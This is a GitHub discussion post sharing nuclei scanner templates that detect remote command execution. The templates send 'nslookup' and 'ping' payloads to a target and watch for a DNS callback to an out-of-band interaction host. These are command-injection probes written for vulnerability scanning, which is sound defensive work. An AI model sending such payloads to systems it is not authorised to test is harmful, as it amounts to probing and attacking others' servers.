### DISCUSSION TITLE
Common RCE command for Windows / Linux platform

### DISCUSSION THREAD

**Discussion by ehsandeep** [projectdiscovery/nuclei-templates#6339] [Show and tell]
###  `nslookup`
>  same command works for both platforms, so it's a good option in terms of coverage without making any additional requests.

Example Template:

```yaml
requests:
  - method: POST
    path:
      - "{{BaseURL}}"

    body: nslookup {{interactsh-url}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
```

### `ping`

Example Template:

```yaml
requests:
  - method: POST
    path:
      - "{{BaseURL}}"

    body: ping {{os}}.{{interactsh-url}}

    payloads:
      os:
        - '-c 3 lin'
        - '-n 3 win'
        
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
```
